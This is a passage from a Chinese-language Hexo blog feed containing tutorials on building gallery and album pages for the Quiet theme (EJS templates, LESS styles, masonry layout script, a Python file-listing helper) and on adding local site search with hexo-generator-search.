    width: 60vw;
    }
    }
    .description-container{
    p{
    font-size: 18px;
    }
    }
    }
    }
    }
    }
    }

    演示

    ​ 大功告成,对应的 block 风格页面:相册-Zi-Zi’s Journey

    png

    \研究生\index.md 的布局:

    title: 研究生
    date: 2023-12-29 14:47:00
    type: galleries
    layout: galleries
    layout_style: card
    headers: 大河之北
    galleries:
    - {title: "福州", description: "WAIYA! 鼓山脚 南门兜 我如鱼得水", cover: "/images/gallery_covers/研究生/福州.jpg"}
    - {title: "保定-春夏", description: "保定没有爱情,只有他蜡笔还不完的饥荒。", cover: "/images/gallery_covers/研究生/保定-春夏.jpg"}
    - {title: "保定-秋冬", description: "雪花飘飘,北风萧萧。", cover: "/images/gallery_covers/研究生/保定-秋冬.jpg"}
    - {title: "石家庄", description: "直到大厦崩塌", cover: "/images/gallery_covers/研究生/石家庄.jpg"}
    - {title: "厦门", description: "再鼓楼润湖里搞涢涢!", cover: "/images/gallery_covers/研究生/厦门.jpg"}
    - {title: "武汉", description: "这辈子又可以见到小迷糊了!", cover: "/images/gallery_covers/研究生/武汉.jpg"}
    - {title: "雄安", description: "千年大计,国家大事。", cover: "/images/gallery_covers/研究生/雄安.jpg"}
    - {title: "天津", description: "天天乐道,津津有味。", cover: "/images/gallery_covers/研究生/天津.jpg"}
    - {title: "正定", description: "太能走了凡哥!", cover: "/images/gallery_covers/研究生/正定.jpg"}

    ​ 对应的 card 风格页面:

    png

    index.md

    ​ 同理,给使用 layoutgalleryindex.md 设计变量,这些变量在gallery.ejs 中会以 page.XXX 的形式读取:

    title: 保定-秋冬
    date: 2023-12-29 14:47:00
    type: gallery
    layout: gallery
    description: 你们南方人的四季是不完整的。——阿杰
    imgs:
    - {title: "积雪的人行道", src: ../../../XXX.jpg}
    - ...
    - {title: "和美保定", src: ../../../XXX.jpg}
    comments: true
    • title 标题

    • date 时间,但在这里我并没用到

    • type 页面属性

    • layout 布局属性

    • description 相册描述

    • imgs 定义的一个图片类(暂且先设计一个变量)

      • title 图片的描述
      • src 对应的 src 地址,可以是绝对地址也可以是相对地址
    • comments 是否打开评论功能

    逐个输入图像链接是费劲的,可以考虑借助其他工具批量生成这样的信息。

    ​批量生成这样的信息的代码:

    import os

    for file in os.listdir(r'D:\Study\GzBlog-Github\source\_posts\Diary-浙了(二)'):
    print(' ' + r'- {title: "XXX", src: /2024/02/26/Diary-浙了(二)/' + file + '}')

    gallery.ejs

    ​ 在 gallery.ejs 中调用这些变量:

    <%- partial('_partial/header',{name:'galleries'}) %>
    <%- partial('_widget/header_body',{message: page.description ? page.description : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
    <%- js('js/masonry.pkgd.js') %>
    <%- js('js/imagesloaded.pkgd.js') %>
    <style> *{ box-sizing: border-box; } </style>

    <div class="gallery-content">
    <div class="grid">
    <div class="grid-sizer"></div>
    <% if (page.imgs && page.imgs.length > 0) { %>
    <% page.imgs.forEach(function(item) { %>
    <div class="grid-item">
    <a href="<%- item.src %>"
    title="<%- item.title %>"
    data-src="<%- item.src %>"
    class="fancybox"
    data-fancybox="fancybox-gallery-img"
    rel="article">
    <img src="<%- item.src %>" alt="<%- item.title %>" />
    </a>
    </div>
    <% }) %>
    <% } %>
    </div>
    <div style="width: 100%; height: 20px;"></div>
    <div class="description-container"><span></span></div>
    <div style="width: 100%; height: 20px;"></div>
    <div id="gitalk-container"></div>
    </div>

    <script>var lazyLoad = <%= theme.lazyload %></script>
    <%- js('js/gallery.js') %>

    gallery.less

    ​ 同理,创建并编写对应的 galleriy.less 如下:

    .gallery-content {
    width: 100%;
    padding: 2px 0;
    max-width: 1200px;
    margin: -64px auto auto auto;
    border-radius: 10px;
    background: #FFF;

    .grid:after {
    content: '';
    display: block;
    clear: both;
    }

    .grid-sizer,
    .grid-item {
    width: 33%;
    }

    .grid-item {
    float: left;
    padding: 10px;
    }

    .grid-item img {
    display: block;
    max-width: 100%;
    border-radius: 10px;
    }

    .fancybox:hover {
    z-index: 2;
    transform: scale(1.1);
    }

    .description-container {
    z-index: 2;
    position: sticky;
    width: 100%;
    left: 0;
    right: 0;
    height: 40px;
    bottom: 0;
    background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
    text-align: center;
    flex-direction: column;
    align-items: center;

    span {
    font-size: 18px;
    color: #12183A;
    text-shadow: 0 0 10px rgba(128, 128, 128, 0.8);
    position: absolute;
    bottom: 50%;
    left: 50%;
    transform: translate(-50%, 50%);
    }
    }

    // 屏幕宽度较小时(如手机端),只显示一列
    @media screen and (max-width: 660px) {
    .grid-sizer,
    .grid-item {
    width: 100%;
    }
    }
    }

    gallery.js

    function initGallery()

    ​ 因为设置了懒加载,在图片载入完毕的时候需要执行 $grid.masonry(); 以更新布局。

    function initGallery()
    {
    var $grid = $('.grid').masonry({
    itemSelector: '.grid-item',
    percentPosition: true,
    columnWidth: '.grid-sizer'
    });
    if(lazyLoad)
    {
    window.imageLazyLoadSetting = {
    onImageLoaded: function() {
    $grid.masonry();
    }
    };
    }
    else
    {
    // layout Masonry after each image loads
    $grid.imagesLoaded().progress(function() {
    $grid.masonry();
    });
    }
    galleryBottom();
    }

    $(document).ready(function() {
    initGallery();
    });

    function galleryBottom()

    ​ Javascript 代码如下:

    • 对于移动端,获取当前屏幕中间的图片 title,显示到底边栏中。
    • 对于电脑端,当鼠标移动到某张图片上时,将对应的 title 显示到底边栏中。
    function galleryBottom(){
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent))
    {
    var descriptionContainer = document.querySelector('.description-container span');
    document.addEventListener("scroll", function () {
    var title = getBottomTitle();
    descriptionContainer.textContent = title;
    }, 3000);
    }
    else {
    var galleryContent = document.querySelector('.grid');
    var descriptionContainer = document.querySelector('.description-container span');

    galleryContent.addEventListener('mouseover', function(event) {
    if (event.target.tagName.toLowerCase() === 'img') {
    var title = event.target.getAttribute('alt');
    descriptionContainer.textContent = title;
    }
    });

    galleryContent.addEventListener('mouseout', function(event) {
    if (event.target.tagName.toLowerCase() === 'img') {
    descriptionContainer.textContent = '';
    }
    });
    }

    function getBottomTitle() {
    var elements = document.querySelectorAll('.fancybox');
    var viewportHeight = window.innerHeight;
    var bottomElement = null;
    for (var i = 0; i < elements.length; i++) {
    var rect = elements[i].getBoundingClientRect();

    if (rect.bottom <= viewportHeight && (!bottomElement || rect.bottom > bottomElement.rect.bottom)) {
    bottomElement = {
    element: elements[i],
    rect: rect
    }
    }
    }
    if (bottomElement) {
    return bottomElement.element.title;
    }
    }
    }

    演示

    ​ 大功告成,瀑布流相册的演示:

    png

    ​ 真是太棒了!其他功能,再慢慢设计,想到哪写到哪。

    python 辅助

    ​python 辅助生成 gallery 格式的相关信息:

    import os

    for file in os.listdir(r'D:XXX'):
    print(' ' + r'- {title: "XXX", src: /XXX' + file + '}')
    ]]>
    + 前言

    ​ 拍的照片多了,设计一个相册功能便于更直观地展示拍的各种好看的照片😇!


    ​ 参考资料:

    正文

    子链接的创建

    ​ 在 hexo 项目的 source 文件中,新建一个 galleries 文件夹,再在里面放上 index.md(可以使用命令行),

    1
    hexo new page gallery

    ​ 渲染博客的时候就会渲染 /galleries 这个网址,如 相册-Zi-Zi’s Journey

    png

    ​ 同样地,如果在 galleries 里放上其它文件夹,文件夹里再放上 index.md,渲染博客的时候就会再渲染下一级的网址,如:…/…/…/…/galleries/研究生 。

    png

    ​ 继续套娃,套到相册(layout 为 gallery)为止:

    png

    相册的入口

    ​ 设置好了子链接就要设置好入口,一般在主题的 _config.yml 中配置。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    # 导航名称
    menus_title:
    home: 主页
    archives: 统计
    categories: 类别
    tags: 标签
    galleries: 相册
    links: 链接
    about: 关于

    # 导航
    menus:
    home: /
    archives: /archives
    categories: /categories
    tags: /tags
    galleries: /galleries
    links: /links
    about: /about

    ​ 渲染博客,导航栏就多了一项 相册,且点进去能够正确转入 /galleries

    png

    ​ 其它有关页面的参数也设置一下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    # 每个页面的展示的图标和一句话
    headers:
    home: {
    message: "居然被你找到了这里!",
    icon: "/images/logo.png",
    cover: "#f5f9fd"
    }
    archives: {
    # 这里会替换掉两个变量{ year 年,number 总数 } 当然也可以不写这两个变量
    message: "居然用了 year 年一共才写了 number 篇文章!",
    icon: "/images/archives.svg",
    cover: "#f5f9fd"
    }
    categories: {
    message: "好像也没分几类",
    icon: "/images/categories.svg",
    cover: "#f5f9fd"
    }
    tags: {
    message: "这里是一些展示的标签",
    icon: "/images/tags.svg",
    cover: "#f5f9fd"
    }
    galleries: {
    message: "有趣的相册~(施工中)",
    icon: "/images/galleries.svg",
    cover: "#f5f9fd"
    }
    links: {
    message: "给我读过的学校递一杯卡布奇诺~",
    icon: "/images/links.svg",
    cover: "#f5f9fd"
    }

    ​ 手撸一个风格相近的图标:

    png

    创建相册页面的布局

    ​ 编辑创建的 index.md,头部信息是由 yaml 语法组成的:

    1
    2
    3
    4
    title: 相册
    date: 2023-12-29 09:46:29
    type: galleries
    layout: galleries

    ​ 以自己所用主题为例,这表示这个网页页面布局将使用 galleries 渲染。

    ​ 我设计了两种页面:

    • galleries 用于展示相册
    • gallery 用于展示相册里的图片

    ​ 在主题对应的文件夹里创建 galleries.ejsgallery.ejs,页面就会按照对应的 .ejs 文件渲染:

    png

    galleries 设计

    index.md

    ​ 给使用 layoutgalleriesindex.md 设计变量,这些变量在galleries.ejs 中会以 page.XXX 的形式读取:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    title: 相册
    date: 2023-12-29 09:46:29
    type: galleries
    layout: galleries
    layout_style: block
    comments: false
    galleries:
    - {title: "研究生", description: "Tell me 他乡的困难会不会比它鼓山高?", cover: "/images/gallery_covers/研究生.jpg"}
    - {title: "本科", description: "闽江江水都流向,流向长乐的海……", cover: "/images/gallery_covers/本科.jpg"}
    - {title: "小时候", description: "我让过去的自己只留在,安静的白马河。", cover: "/images/gallery_covers/小时候.jpg"}
    • title 标题
    • date 时间,但在这里我并没用到
    • type 页面属性
    • layout 布局属性
    • layout_style 布局风格,我这里设计了两种风格 blockcard
    • galleries 相册列表,列表里的内容必须符合子文件夹的属性(我没有想到如何自动遍历子文件夹并获取相关参数的办法,只能这手动档了。)
      • title 相册标题
      • description 相册描述
      • cover 相册封面
      • cover_style 我这里没设置,可以控制封面图片的 style
    • comments 是否打开评论功能

    galleries.ejs

    galleries.ejs 的内容参考如下:(修改 galleries.ejs 的内容要重新生成博客才可以重新渲染,如果调试不方便,可以将代码以 <%- partial('_partial/XXX' %> 跳转到其他地方以便于调试)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    <%- partial('_partial/header',{name:'galleries'}) %>

    <div class="galleries">
    <%- partial('_widget/header_body',{message: page.headers ? page.headers : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
    <div class="main">
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>" id="content">
    <% page.galleries.forEach(function(item) { %>
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>-content">
    <a class="img-container" href="<%= item.title %>">
    <div class="photo-frames">
    <img style="<%- item.cover_style || '' %>" src="<%= item.cover ? item.cover : theme.default_cover %>" alt="Cover">
    </div>
    <p class="title"><%= item.title %></p>
    </a>
    <div class="description-container"><p><%= item.description %></p></div>
    </div>
    <% }); %>
    <div id="gitalk-container"></div>
    </div>
    </div>
    </div>

    ​ 就是将读取到信息展示在页面上的逻辑。

    galleries.less

    ​ 创建并编写对应的 galleries.less 如下(记得在一个地方引用):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    .galleries{
    .main {
    display: flex;
    flex-grow: 1;
    flex-basis: auto;
    flex-direction: column;
    margin-top: -64px;
    .post-block{
    padding: 0 calc((100% - 1160px)/2);
    margin-bottom: 50px;
    &-content{
    margin: 20px 100px 60px 100px;
    text-decoration: none;
    height: 240px;
    justify-content: center; /* 添加此行以实现水平居中对齐 */
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
    grid-gap: 10px; /* 控制子容器之间的间距 */
    position: relative;
    top: 0px;
    transition: all .5s ease-in-out;
    -moz-transition: all .5s;
    -webkit-transition: all .5s;
    -o-transition: all .5s;
    &:hover {
    top: -15px;
    }
    .img-container{
    justify-content: center;
    display: flex;
    transform: rotate(-5deg);
    transition: transform ease-in-out 0.5s;
    &:hover {
    transform: rotate(-10deg);
    }
    .photo-frames{
    width: 200px;
    border: 10px solid #FFF; /* 相框的边框样式和颜色 */
    border-radius: 5px;
    background: #FFF;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
    img{
    border-radius: 2px;
    margin-top: 10px;
    width: 100%;
    height: 75%;
    object-fit: cover;
    }
    }
    }
    .title{
    bottom: 15px;
    position: absolute;
    font-weight: bold;
    text-decoration: none;
    color: @textColorTheme;
    font-size: 22px;
    font-weight: 500;
    }
    .description-container{
    margin-top: 80px;
    p{
    text-indent: 2em;
    font-size: 20px;
    position: absolute;
    }
    }
    }
    @media screen and (max-width:660px) {
    &-content{
    margin: 20px;
    padding: 20px;
    .title{
    bottom: 5%;
    }
    .description-container{
    p{
    font-size: 18px;
    }
    }
    }
    }
    @media screen and (max-width:489px) {
    &-content{
    height: 320px;
    margin-bottom: 40px;
    .img-container{
    .photo-frames{
    width: 60vw;
    }
    }
    .description-container{
    margin-top: 40px;
    }
    }
    }
    }

    .post-card{
    display: flex;
    max-width: 100%;
    padding: 0 calc((100% - 1200px)/2) 40px;
    flex-wrap: wrap;
    justify-content: center;
    align-items: stretch;
    margin-top: -64px;
    &-content{
    margin: 20px 40px 80px 40px;
    text-decoration: none;
    height: 400px;
    justify-content: center; /* 添加此行以实现水平居中对齐 */
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
    grid-gap: 10px; /* 控制子容器之间的间距 */
    position: relative;
    top: 0px;
    transition: all .5s ease-in-out;
    -moz-transition: all .5s;
    -webkit-transition: all .5s;
    -o-transition: all .5s;
    &:hover {
    top: -15px;
    }
    .img-container{
    justify-content: center;
    display: flex;
    transform: rotate(-5deg);
    transition: transform ease-in-out 0.5s;
    &:hover {
    transform: rotate(-10deg);
    }
    .photo-frames{
    width: 220px;
    border: 10px solid #FFF; /* 相框的边框样式和颜色 */
    border-radius: 5px;
    background: #FFF;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
    img{
    border-radius: 2px;
    margin-top: 10px;
    width: 100%;
    height: 75%;
    object-fit: cover;
    }
    }
    }
    .title{
    bottom: 20px;
    position: absolute;
    font-weight: bold;
    text-decoration: none;
    color: @textColorTheme;
    font-size: 22px;
    font-weight: 500;
    }
    .description-container{
    margin-top: 40px;
    p{
    text-indent: 2em;
    font-size: 20px;
    position: absolute;
    }
    }
    }

    @media screen and (max-width:640px) {
    &-content{
    margin: 80px 20px;
    padding: 20px;
    height: 400px;
    .title{
    bottom: 5%;
    }
    .img-container{
    .photo-frames{
    width: 60vw;
    }
    }
    .description-container{
    p{
    font-size: 18px;
    }
    }
    }
    }
    }
    }
    }

    演示

    ​ 大功告成,对应的 block 风格页面:相册-Zi-Zi’s Journey

    png

    \研究生\index.md 的布局:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    title: 研究生
    date: 2023-12-29 14:47:00
    type: galleries
    layout: galleries
    layout_style: card
    headers: 大河之北
    galleries:
    - {title: "福州", description: "WAIYA! 鼓山脚 南门兜 我如鱼得水", cover: "/images/gallery_covers/研究生/福州.jpg"}
    - {title: "保定-春夏", description: "保定没有爱情,只有他蜡笔还不完的饥荒。", cover: "/images/gallery_covers/研究生/保定-春夏.jpg"}
    - {title: "保定-秋冬", description: "雪花飘飘,北风萧萧。", cover: "/images/gallery_covers/研究生/保定-秋冬.jpg"}
    - {title: "石家庄", description: "直到大厦崩塌", cover: "/images/gallery_covers/研究生/石家庄.jpg"}
    - {title: "厦门", description: "再鼓楼润湖里搞涢涢!", cover: "/images/gallery_covers/研究生/厦门.jpg"}
    - {title: "武汉", description: "这辈子又可以见到小迷糊了!", cover: "/images/gallery_covers/研究生/武汉.jpg"}
    - {title: "雄安", description: "千年大计,国家大事。", cover: "/images/gallery_covers/研究生/雄安.jpg"}
    - {title: "天津", description: "天天乐道,津津有味。", cover: "/images/gallery_covers/研究生/天津.jpg"}
    - {title: "正定", description: "太能走了凡哥!", cover: "/images/gallery_covers/研究生/正定.jpg"}

    ​ 对应的 card 风格页面:

    png

    index.md

    ​ 同理,给使用 layoutgalleryindex.md 设计变量,这些变量在gallery.ejs 中会以 page.XXX 的形式读取:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    title: 保定-秋冬
    date: 2023-12-29 14:47:00
    type: gallery
    layout: gallery
    description: 你们南方人的四季是不完整的。——阿杰
    imgs:
    - {title: "积雪的人行道", src: ../../../XXX.jpg}
    - ...
    - {title: "和美保定", src: ../../../XXX.jpg}
    comments: true
    • title 标题

    • date 时间,但在这里我并没用到

    • type 页面属性

    • layout 布局属性

    • description 相册描述

    • imgs 定义的一个图片类(暂且先设计一个变量)

      • title 图片的描述
      • src 对应的 src 地址,可以是绝对地址也可以是相对地址
    • comments 是否打开评论功能

    逐个输入图像链接是费劲的,可以考虑借助其他工具批量生成这样的信息。

    ​批量生成这样的信息的代码:

    1
    2
    3
    4
    import os

    for file in os.listdir(r'D:\Study\GzBlog-Github\source\_posts\Diary-浙了(二)'):
    print(' ' + r'- {title: "XXX", src: /2024/02/26/Diary-浙了(二)/' + file + '}')

    gallery.ejs

    ​ 在 gallery.ejs 中调用这些变量:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    <%- partial('_partial/header',{name:'galleries'}) %>
    <%- partial('_widget/header_body',{message: page.description ? page.description : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
    <%- js('js/masonry.pkgd.js') %>
    <%- js('js/imagesloaded.pkgd.js') %>
    <style> *{ box-sizing: border-box; } </style>

    <div class="gallery-content">
    <div class="grid">
    <div class="grid-sizer"></div>
    <% if (page.imgs && page.imgs.length > 0) { %>
    <% page.imgs.forEach(function(item) { %>
    <div class="grid-item">
    <a href="<%- item.src %>"
    title="<%- item.title %>"
    data-src="<%- item.src %>"
    class="fancybox"
    data-fancybox="fancybox-gallery-img"
    rel="article">
    <img src="<%- item.src %>" alt="<%- item.title %>" />
    </a>
    </div>
    <% }) %>
    <% } %>
    </div>
    <div style="width: 100%; height: 20px;"></div>
    <div class="description-container"><span></span></div>
    <div style="width: 100%; height: 20px;"></div>
    <div id="gitalk-container"></div>
    </div>

    <script>var lazyLoad = <%= theme.lazyload %></script>
    <%- js('js/gallery.js') %>

    gallery.less

    ​ 同理,创建并编写对应的 galleriy.less 如下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    .gallery-content {
    width: 100%;
    padding: 2px 0;
    max-width: 1200px;
    margin: -64px auto auto auto;
    border-radius: 10px;
    background: #FFF;

    .grid:after {
    content: '';
    display: block;
    clear: both;
    }

    .grid-sizer,
    .grid-item {
    width: 33%;
    }

    .grid-item {
    float: left;
    padding: 10px;
    }

    .grid-item img {
    display: block;
    max-width: 100%;
    border-radius: 10px;
    }

    .fancybox:hover {
    z-index: 2;
    transform: scale(1.1);
    }

    .description-container {
    z-index: 2;
    position: sticky;
    width: 100%;
    left: 0;
    right: 0;
    height: 40px;
    bottom: 0;
    background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
    text-align: center;
    flex-direction: column;
    align-items: center;

    span {
    font-size: 18px;
    color: #12183A;
    text-shadow: 0 0 10px rgba(128, 128, 128, 0.8);
    position: absolute;
    bottom: 50%;
    left: 50%;
    transform: translate(-50%, 50%);
    }
    }

    // 屏幕宽度较小时(如手机端),只显示一列
    @media screen and (max-width: 660px) {
    .grid-sizer,
    .grid-item {
    width: 100%;
    }
    }
    }

    gallery.js

    function initGallery()

    ​ 因为设置了懒加载,在图片载入完毕的时候需要执行 $grid.masonry(); 以更新布局。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    function initGallery()
    {
    var $grid = $('.grid').masonry({
    itemSelector: '.grid-item',
    percentPosition: true,
    columnWidth: '.grid-sizer'
    });
    if(lazyLoad)
    {
    window.imageLazyLoadSetting = {
    onImageLoaded: function() {
    $grid.masonry();
    }
    };
    }
    else
    {
    // layout Masonry after each image loads
    $grid.imagesLoaded().progress(function() {
    $grid.masonry();
    });
    }
    galleryBottom();
    }

    $(document).ready(function() {
    initGallery();
    });

    function galleryBottom()

    ​ Javascript 代码如下:

    • 对于移动端,获取当前屏幕中间的图片 title,显示到底边栏中。
    • 对于电脑端,当鼠标移动到某张图片上时,将对应的 title 显示到底边栏中。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    function galleryBottom(){
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent))
    {
    var descriptionContainer = document.querySelector('.description-container span');
    document.addEventListener("scroll", function () {
    var title = getBottomTitle();
    descriptionContainer.textContent = title;
    }, 3000);
    }
    else {
    var galleryContent = document.querySelector('.grid');
    var descriptionContainer = document.querySelector('.description-container span');

    galleryContent.addEventListener('mouseover', function(event) {
    if (event.target.tagName.toLowerCase() === 'img') {
    var title = event.target.getAttribute('alt');
    descriptionContainer.textContent = title;
    }
    });

    galleryContent.addEventListener('mouseout', function(event) {
    if (event.target.tagName.toLowerCase() === 'img') {
    descriptionContainer.textContent = '';
    }
    });
    }

    function getBottomTitle() {
    var elements = document.querySelectorAll('.fancybox');
    var viewportHeight = window.innerHeight;
    var bottomElement = null;
    for (var i = 0; i < elements.length; i++) {
    var rect = elements[i].getBoundingClientRect();

    if (rect.bottom <= viewportHeight && (!bottomElement || rect.bottom > bottomElement.rect.bottom)) {
    bottomElement = {
    element: elements[i],
    rect: rect
    }
    }
    }
    if (bottomElement) {
    return bottomElement.element.title;
    }
    }
    }

    演示

    ​ 大功告成,瀑布流相册的演示:

    png

    ​ 真是太棒了!其他功能,再慢慢设计,想到哪写到哪。

    python 辅助

    ​python 辅助生成 gallery 格式的相关信息:

    1
    2
    3
    4
    import os

    for file in os.listdir(r'D:XXX'):
    print(' ' + r'- {title: "XXX", src: /XXX' + file + '}')
    ]]>
    @@ -3586,7 +3586,7 @@ /posts/Hexo-Quiet%20%E4%B8%BB%E9%A2%98%E9%AD%94%E6%94%B9%E7%AC%94%E8%AE%B0/ - 前言

    ​ 这个 Quiet 主题的布局个人是很喜欢的,风格简洁且小众。可惜它相比于主流的 NexTButterflyFluid 等的功能还是太少了😇,于是决定魔改一下它。

    ​ 这篇博客记录了给这个主题添加的各种功能。

    正文

    站内搜索

    ​ 博客里 bb 了太多东西,考虑加一个站内搜索方便检索一下之前的文章。

    ​ 安装完 hexo-generator-search 插件后,hexo g 就会在 public 文件夹下创建 ./search.xml,这会把所有博客的文章内容整合进去。

    png

    后端(算是吧)

    ​ 接下来就是靠 JS 如何检索文章。Butterfly 已经有自带检索文章的功能了,研究了一会儿没研究出怎么把代码偷下来……找到了一个从零配置搜索功能的文章:

    ​ 核心就是下面这个 search.js 了,魔改一下:

    // search.js
    // A local search script with the help of hexo-generator-search
    // Copyright (C) 2015
    // Joseph Pan <http://github.com/wzpan>
    // Shuhao Mao <http://github.com/maoshuhao>
    // This library is free software; you can redistribute it and/or modify
    // it under the terms of the GNU Lesser General Public License as
    // published by the Free Software Foundation; either version 2.1 of the
    // License, or (at your option) any later version.
    //
    // This library is distributed in the hope that it will be useful, but
    // WITHOUT ANY WARRANTY; without even the implied warranty of
    // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
    // Lesser General Public License for more details.
    //
    // You should have received a copy of the GNU Lesser General Public
    // License along with this library; if not, write to the Free Software
    // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    // 02110-1301 USA

    var searchFunc = function (path, search_id, content_id, match_count_id) {
    $.ajax({
    url: path,
    dataType: "xml",
    success: function (xmlResponse) {
    // get the contents from search data
    var datas = $("entry", xmlResponse).map(function () {
    return {
    title: $("title", this).text(),
    content: $("content", this).text(),
    url: $("url", this).text()
    };
    }).get();
    var $input = document.getElementById(search_id);
    var $resultContent = document.getElementById(content_id);
    $input.addEventListener('input', function () {
    var str = '<ul class=\"search-result-list\">';
    var keywords = this.value.trim().split(/[\s\-]+/); // .toLowerCase().split(/[\s\-]+/);
    $resultContent.innerHTML = "";
    if (this.value.trim().length <= 0) {
    document.getElementById(match_count_id).textContent = "";
    return;
    }
    // perform local searching
    datas.forEach(function (data) {
    var isMatch = true;
    if (!data.title || data.title.trim() === '') {
    data.title = "Untitled";
    }
    var data_title = data.title.trim();//.toLowerCase();
    var data_content = data.content.trim().replace(/<[^>]+>/g, "");//.toLowerCase();
    var data_url = data.url;
    var index_title = -1;
    var index_content = -1;
    var first_occur = -1;
    // only match artiles with not empty contents
    if (data_content !== '') {
    keywords.forEach(function (keyword, i) {
    index_title = data_title.indexOf(keyword);
    index_content = data_content.indexOf(keyword);

    if (index_title < 0 && index_content < 0) {
    isMatch = false;
    } else {
    if (index_content < 0) {
    index_content = 0;
    }
    if (i == 0) {
    first_occur = index_content;
    }
    // content_index.push({index_content:index_content, keyword_len:keyword_len});
    }
    });
    } else {
    isMatch = false;
    }
    // show search results
    if (isMatch) {
    str += "<li><a href='" + data_url +
    "' class='search-result-title'>" + data_title + "</a>";
    var content = data.content.trim().replace(/<[^>]+>/g, "");
    if (first_occur >= 0) {
    // cut out 100 characters
    var start = first_occur - 20;
    var end = first_occur + 80;
    if (start < 0) {
    start = 0;
    }
    if (start == 0) {
    end = 100;
    }
    if (end > content.length) {
    end = content.length;
    }
    var match_content = content.substr(start, end);
    // highlight all keywords
    keywords.forEach(function (keyword) {
    var regS = new RegExp(keyword, "gi");
    match_content = match_content.replace(regS,
    "<em class=\"search-keyword\">" +
    keyword + "</em>");
    });
    str += "<p class=\"search-result\">" + match_content +
    "...</p>"
    }
    str += "</li>";
    }
    });
    str += "</ul>";
    if (str.indexOf('<li>') === -1) {
    document.getElementById(match_count_id).textContent = "";
    return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容,更换下搜索词试试吧~<span></ul>";
    }
    else
    {
    document.getElementById(match_count_id).innerHTML = "匹配到 <b><font size=\"5px\"><font color=\"#424242\">" + str.match(/<li>/g).length + "</font></font></b> 个结果。";
    }
    $resultContent.innerHTML = str;
    });
    }
    });
    }

    ​ 大致意思就是读取输入框 search_id 里的内容,从 path./search.xml)检索内容,将检索到的内容和计数分别以列表形式追加到 content_idmatch_count_id 中。

    前端

    search.ejs

    ​ OK,后端就是这样,接下来写前端 search.ejs

    <div class="page-header">
    <div class="search-dialog">
    <span id="local-search" class="local-search local-search-plugin">
    <h2>站内搜索</h2>
    <div class="local-search-input-box">
    <img class="search_icon" src="<%- theme.icon.search %>" />
    <input type="search" placeholder="输入关键字以搜索……" id="local-search-input" class="local-search-input-cls" />
    </div>
    <div id="local-search-result" class="local-search-result-cls"></div>
    <hr></hr>
    <p id="local-search-match-count" class="local-search-match-count"></p>
    </span>
    </div>
    <script>
    if ($('.local-search').size()) {
    $.getScript('/js/search.js', function () {
    searchFunc('/search.xml', 'local-search-input', 'local-search-result', 'local-search-match-count')
    })
    }
    </script>
